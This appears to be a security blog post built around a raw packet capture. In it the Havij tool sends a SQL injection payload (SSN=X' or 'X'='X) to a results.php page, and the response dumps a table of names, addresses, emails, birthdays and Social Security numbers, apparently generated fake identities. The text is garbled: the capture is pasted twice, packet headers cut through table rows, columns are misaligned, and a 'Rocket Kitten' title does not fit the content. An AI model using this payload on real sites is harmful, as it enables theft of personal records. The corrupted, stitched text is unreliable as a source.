Download Attachments
References:
https://www.hybrid-analysis.com/sample/69e48eb82ce7387d65cc1a82c5a6a170dc6121d479736b1dd33358d09c483617/?environmentId=1
http://securitywarrior.ca/index.php/2015/11/09/rocket-kitten-a-campaign-with-9-lives/
2016-04-23 14:02:38.157746 IP 84.11.146.55.1475 > 192.168.1.124.80: Flags [P.], seq 1:405, ack 1, win 258, length 404: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1
E…’.@…)%T..7…|…P.E. }..P…….GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1
Connection: close
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, /;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en;q=0.5
Host: www.allsafesec.com
Referer: http://www.allsafesec.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij
2016-04-23 14:02:38.161384 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], ack 391, win 159, length 0
E..(..@.@.yR…|T..7.P.. }…E..P….P……..
2016-04-23 14:02:38.172462 IP 84.11.146.55.137 > 8.8.4.4.137: NBT UDP PACKET(137): REFRESH(8); REQUEST; UNICAST
E..A.......T..7.........LVG..@......... EGEBECEMEFFECACACACACACACACACAAA.. ..... ........….w
2016-04-23 14:02:38.183008 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 1:961, ack 391, win 159, length 960: HTTP: HTTP/1.1 200 OK
E…..@.@.u….|T..7.P.. }…E..P…….HTTP/1.1 200 OK
Date: Sat, 23 Apr 2016 18:02:43 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.16
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
2039
84.11.146.55.1475: Flags [.], seq 3841:4801, ack 391, win 159, length 960: HTTP
E…..@.@.u….|T..7.P.. }…E..P…F…>
Rocket Kitten: A campaign with 9 lives2016-04-23 14:02:38.157746 IP 84.11.146.55.1475 > 192.168.1.124.80: Flags [P.], seq 1:405, ack 1, win 258, length 404: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1 E…’.@…)%T..7…|…P.E. }..P…….GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1 Connection: close Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US, en;q=0.5 Host: www.allsafesec.com Referer: http://www.allsafesec.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij 2016-04-23 14:02:38.161384 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], ack 391, win 159, length 0 E..(..@.@.yR…|T..7.P.. }…E..P….P…….. 2016-04-23 14:02:38.172462 IP 84.11.146.55.137 > 8.8.4.4.137: NBT UDP PACKET(137): REFRESH(8); REQUEST; UNICAST E..`A…….T..7………LVG..@……… EGEBECEMEFFECACACACACACACACACAAA.. ….. ……..`….w 2016-04-23 14:02:38.183008 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 1:961, ack 391, win 159, length 960: HTTP: HTTP/1.1 200 OK E…..@.@.u….|T..7.P.. }…E..P…….HTTP/1.1 200 OK Date: Sat, 23 Apr 2016 18:02:43 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.16 Connection: close Transfer-Encoding: chunked Content-Type: text/html 2039
| Title | First Name | Last Name | Street Address | City | State | Birthday | Social Security Number | |
|---|---|---|---|---|---|---|---|---|
| Mr. | Raymundo | Lawrence | 2315 Cimmaron Road | Garden Grove | CA | RaymundoRLawrence@jourrapide.com | 2/7/1965 | 610-46-2192 |
| Mr. | Mike | Clifton | 4217 Monroe Street | Houston | TX | MikeGClifton@fleckens.hu | 1/22/1947 | 461-14-0824 |
| Mr. | Anton | Cook | 1642 Stonepot Road | Oldwick | NJ | AntonCCook@dayrep.com | 1/16/1956 | 144-15-2105 |
| Mr. | Kevin | Heint 2016-04-23 14:02:38.183557 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 961:1921, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P….]..zelman | 2461 Still Pastures Drive | Chester | SC | KevinEHeintzelman@rhyta.com | 10/30/1982 | 655-14-8336 |
| Ms. | Violette | Williams | 4104 Taylor Street | Harrison | NY | VioletteAWilliams@einrot.com | 1/28/1963 | 131-74-3821 |
| Ms. | Rosa | Richardson | 2147 College Street | Atlanta | GA | RosaRRichardson@jourrapide.com | 9/25/1964 | 258-69-7618 |
| Mr. | Donald | Flanery | 3189 Valley Street | Camden | NJ | DonaldCFlanery@einrot.com | 6/27/1957 | 148-28-3332 |
| Ms. | Carmella | Godwin | 1686 Vine Street | Hickory Hills | IL | CarmellaAGodwin@teleworm.us | 3/14/1968 | 325-92-0303 |
| Mrs. | Lorene | Culbertson | 3195 Single Street 84.11.146.55.1475: Flags [.], seq 1921:2881, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P…+ ..d> | Kingston | MA | LoreneWCulbertson@fleckens.hu | 10/25/1983 | 010-70-3813 |
| Mr. | Marcel | Bing | 2533 Stoneybrook Road | Cocoa | FL | MarcelMBing@cuvox.de | 12/5/1984 | 767-26-2410 |
| Mr. | Andrew | Kinne | 1919 Eden Drive | Richmond | VA | AndrewDKinne@fleckens.hu | 1/8/1975 | 228-04-3976 |
| Mr. | Alex | Hensley | 2621 Tree Top Lane | New Tripoli | PA | AlexVHensley@einrot.com | 3/2/1956 | 178-64-8921 |
| Dr. | Marisol | Moore | 1351 Elk City Road | Shreveport | LA | MarisolWMoore@gustr.com | 12/14/1973 | 437-57-3234 |
| Ms. | Brenda | Clark | 504 Roosevelt Street | San Francisco | CA | BrendaDClark@fleckens.hu | 11/16 2016-04-23 14:02:38.183563 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 2881:3841, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }.A.E..P….F../1988 | 620-68-6663 |
| Mr. | Herschel | Melton | 3752 Arbutus Drive | Doral | FL | HerschelMMelton@jourrapide.com | 1/4/1952 | 592-73-6015 |
| Mrs. | Genie | Mills | 750 Diane Street | Oxnard | CA | GenieRMills@rhyta.com | 3/30/1965 | 602-86-5292 |
| Ms. | Mildred | Russo | 3804 Kennedy Court | Walpole | MA | MildredARusso@gustr.com | 5/1/1950 | 024-82-9132 |
| Ms. | Tasha | Williamson | 4716 Single Street | Malden | MA | TashaDWilliamson@fleckens.hu | 1/20/1988 | 025-72-0119 |
| Mrs. | Melonie | Asher | 4190 Seth Street | Abilene | TX | MelonieHAsher@gustr.com | 8/4/1984 | 450-35-0282 |
| Mrs. | Sally | Pernell | 84.11.146.55.1475: Flags [.], seq 3841:4801, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P…F…>664 Pearl Street | Sacramento | CA | SallyLPernell@gustr.com | 8/4/1949 | 568-96-4747 |
| Ms. | Cristina | Strock | 3368 Havanna Street | Greensboro | NC | CristinaCStrock@fleckens.hu | 11/4/1966 | 246-63-4007 |
| Ms. | Mary | Glenn | 4103 Haven Lane | Perry | MI | MaryCGlenn@dayrep.com | 5/30/1978 | 362-40-9856 |
| Mr. | Fred | Murray | 659 Brooke Street | Houston | TX | FredCMurray@superrito.com | 9/25/1954 | 635-26-2048 |
| Mrs. | Cindy | Chandler | 3631 Star Trek Drive | Port St Joe | FL | CindyCChandler@teleworm.us | 2/1/1966 | 591-84-6502 |
| Mrs. | Angela | Savage | 464 Oak Drive | Schenectady | NY | AngelaASavage@sup 2016-04-23 14:02:38.183571 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 4801:5761, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P…….errito.com | 12/5/1989 | 095-32-6531 |
| Ms. | Maria | Rios | 2070 Everette Alley | Ft Lauderdale | FL | MariaERios@fleckens.hu | 5/4/1961 | 263-80-1338 |
| Mr. | Jesse | Terry | 1057 Shady Pines Drive | Madisonville | KY | JesseCTerry@dayrep.com | 9/23/1976 | 406-55-8135 |
| Mrs. | Rhea | Brown | 3112 Thompson Street | Los Angeles | CA | RheaCBrown@gustr.com | 3/18/1968 | 556-56-2402 |
| Mr. | Kevin | Parsons | 3453 Elliott Street | Manchester | NH | KevinJParsons@gustr.com | 4/3/1986 | 002-76-7546 |
| Mr. | Marcos | Dimarco | 4032 South Street | Pecos | TX | MarcosCDimarco@teleworm.us | 7/27/1960 | 636-05-4711 |
| Mr. 192.168.1.124.80: Flags [.], ack 5761, win 258, length 0
E..(‘.@…*.T..7…|…P.E.. ~..P…pm..
2016-04-23 14:05:12.626767 IP 192.168.1.124.80 > 84.11.146.55.1599: Flags [.], ack 3841, win 210, length 0
E..(.k@.@……|T..7.P.?.#<..p..P...|.........
2016-04-23 14:05:12.626768 IP 192.168.1.124.80 > 84.11.146.55.1599: Flags [.], ack 4801, win 225, length 0
E..(.l@.@……|T..7.P.?.#<..p..P...xL........
2016-04-23 14:05:12.626768 IP 192.168.1.124.80 > 84.11.146.55.1599: Flags [.], ack 5761, win 240, length 0
E..(.m@.@……|T..7.P.?.#<..p.VP...t}........
2016-04-23 14:05:12.626838 IP 84.11.146.55.1599 > 192.168.1.124.80: Flags [.], seq 5761:6721, ack 1, win 258, length 960: HTTP
Please follow and like us:   
  Written By admin |